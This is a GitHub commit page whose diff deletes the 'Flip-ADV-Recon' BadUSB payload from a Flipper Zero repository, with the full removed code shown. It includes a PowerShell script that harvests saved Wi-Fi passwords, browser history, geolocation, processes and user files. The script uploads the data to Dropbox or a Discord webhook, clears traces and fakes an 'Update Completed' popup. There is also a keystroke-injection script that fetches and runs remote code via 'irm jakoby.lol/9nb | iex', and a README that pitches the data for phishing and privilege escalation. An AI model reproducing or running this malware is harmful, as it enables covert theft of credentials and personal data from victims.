jinks/Flipper-Zero-BadUSB
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Delete Payloads/Flip-ADV-Recon directory

Browse source
This commit is contained in:
I-Am-Jakoby 2023-07-25 16:22:19 -05:00 committed by GitHub
parent 25fcf460e5
commit 7a3a6acbd4
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
3 changed files with 0 additions and 745 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

588
Payloads/Flip-ADV-Recon/ADV-Recon.ps1
View file

@ -1,588 +0,0 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data.
.DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
All of the gather information is formatted neatly and output to a file.
That file is then exfiltrated to cloud storage via Dropbox.
.Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
#>
############################################################################################################################################################
# MAKE LOOT FOLDER, FILE, and ZIP
$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"
$FileName = "$FolderName.txt"
$ZIP = "$FolderName.zip"
New-Item -Path $env:tmp/$FolderName -ItemType Directory
############################################################################################################################################################
# Enter your access tokens below. At least one has to be provided but both can be used at the same time.
#$db = ""
#$dc = ""
############################################################################################################################################################
# Recon all User Directories
tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
# Powershell history
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
############################################################################################################################################################
function Get-fullName {
try {
$fullName = (Get-LocalUser -Name $env:USERNAME).FullName
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fullName = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$email = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GeoLocation = Get-GeoLocation
$GeoLocation = $GeoLocation -split " "
$Lat = $GeoLocation[0].Substring(11) -replace ".$"
$Lon = $GeoLocation[1].Substring(10) -replace ".$"
############################################################################################################################################################
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String
############################################################################################################################################################
Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }
$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin"
$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop"
$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name
$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name
If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" }
Else{ $UAC = "Unknown" }
############################################################################################################################################################
$lsass = Get-Process -Name "lsass"
if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."}
else {$lsass = "LSASS is not running as a protected process."}
############################################################################################################################################################
$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name
############################################################################################################################################################
# Get nearby wifi networks
try
{
$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
}
catch
{
$NearbyWifi="No nearby wifi networks detected"
}
############################################################################################################################################################
# Get info about pc
# Get IP / Network Info
try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}
catch{$computerPubIP="Error getting Public IP"}
try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String}
catch{$localIP = "Error getting local IP"}
$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String
# Check RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
############################################################################################################################################################
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerName = $computerSystem.Name
$computerModel = $computerSystem.Model
$computerManufacturer = $computerSystem.Manufacturer
$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String
$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String
############################################################################################################################################################
$ScheduledTasks = Get-ScheduledTask
############################################################################################################################################################
$klist = klist sessions
############################################################################################################################################################
$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime
############################################################################################################################################################
# Get HDDs
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250
############################################################################################################################################################
# Get Network Interfaces
$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250
$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
############################################################################################################################################################
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250
# service
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250
# installed software (get uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250
############################################################################################################################################################
# OUTPUTS RESULTS TO LOOT FILE
$output = @"
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' #
# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| ('\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
Full Name: $fullName
Email: $email
GeoLocation:
Latitude: $Lat
Longitude: $Lon
------------------------------------------------------------------------------------------------------------------------------
Local Users:
$luser
------------------------------------------------------------------------------------------------------------------------------
UAC State:
$UAC
LSASS State:
$lsass
RDP State:
$RDP
------------------------------------------------------------------------------------------------------------------------------
Public IP:
$computerPubIP
Local IPs:
$localIP
MAC:
$MAC
------------------------------------------------------------------------------------------------------------------------------
Computer Name:
$computerName
Model:
$computerModel
Manufacturer:
$computerManufacturer
BIOS:
$computerBIOS
OS:
$computerOs
CPU:
$computerCpu
Mainboard:
$computerMainboard
Ram Capacity:
$computerRamCapacity
Total installed Ram:
$computerRam
Video Card:
$videocard
------------------------------------------------------------------------------------------------------------------------------
Contents of Start Up Folder:
$StartUp
------------------------------------------------------------------------------------------------------------------------------
Scheduled Tasks:
$ScheduledTasks
------------------------------------------------------------------------------------------------------------------------------
Logon Sessions:
$klist
------------------------------------------------------------------------------------------------------------------------------
Recent Files:
$RecentFiles
------------------------------------------------------------------------------------------------------------------------------
Hard-Drives:
$Hdds
COM Devices:
$COMDevices
------------------------------------------------------------------------------------------------------------------------------
Network Adapters:
$NetworkAdapters
------------------------------------------------------------------------------------------------------------------------------
Nearby Wifi:
$NearbyWifi
Wifi Profiles:
$wifiProfiles
------------------------------------------------------------------------------------------------------------------------------
Process:
$process
------------------------------------------------------------------------------------------------------------------------------
Listeners:
$listener
------------------------------------------------------------------------------------------------------------------------------
Services:
$service
------------------------------------------------------------------------------------------------------------------------------
Installed Software:
$software
------------------------------------------------------------------------------------------------------------------------------
Drivers:
$drivers
------------------------------------------------------------------------------------------------------------------------------
"@
$output > $env:TEMP\$FolderName/computerData.txt
############################################################################################################################################################
function Get-BrowserData {
[CmdletBinding()]
param (
[Parameter (Position=1,Mandatory = $True)]
[string]$Browser,
[Parameter (Position=1,Mandatory = $True)]
[string]$DataType
)
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"}
elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"}
elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"}
$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $env:UserName
Browser = $Browser
DataType = $DataType
Data = $_
}
}
}
}
Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
############################################################################################################################################################
Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP
# Upload output file to dropbox
function dropbox {
$TargetFilePath="/$ZIP"
$SourceFilePath="$env:TEMP\$ZIP"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $db
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
if (-not ([string]::IsNullOrEmpty($db))){dropbox}
############################################################################################################################################################
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = "$dc"
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
############################################################################################################################################################
# Popup message to signal the payload is done
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1)

12
Payloads/Flip-ADV-Recon/ADV-Recon.txt
View file

@ -1,12 +0,0 @@
REM Title: ADV-Recon
REM Author: I am Jakoby
REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
ENTER

145
Payloads/Flip-ADV-Recon/README.md
View file

@ -1,145 +0,0 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ADV-Recon
A script used to do an advanced level of recon on the target's computer.
Version 2 no longer requires you to host your own version of the script.
Modifying the execution script is the only necessary interaction.
## Description
This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:
* Hosts PowerShell Version (to know what commands can be run)
* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
* Whether they are in the Admin group or not
* The email associated with their Microsoft account (for phishing possibilities)
* Other User accounts on their system (for possible privilege escalation)
* Details on their login settings (Ex: Min/Max password age and length)
* How many days since they have changed their password (Max password age - Days since = Opportunity)
* Their GeoLocation (know their approximate where abouts)
* Nearby Wifi Networks (Possible lateral movement)
* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?)
* WLAN Profiles (List of SSIDs and Passwords stored on their PC)
* Network Interfaces (What are they connecting in and out with)
* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
* Local Users (Accounts on system with Username, name associated with microsoft account and SID)
* Information on their hard drives (Indicator of Recon Scope)
* COM and Serial Devices (Is there a device connected you can manipulate?)
* Active TCP Connections (Poor mans Port Scanning)
* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
* Video Card info (how much vroom vroom?)
* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks)
## Getting Started
### Dependencies
* Dropbox or Discord
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
`$dc` is the variable that stores your discord webhook
`$db` is the variable that stores your dropbox token
Fill in either or both of these two methods to exfil your collected data
```
powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
* 0.2
* Added additional data queries
* Optimized output of data
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/I_Am_Jakoby">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/i_am_jakoby/">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>Discord
</td>
<td align="center" width="96">
<a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>TikTok
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>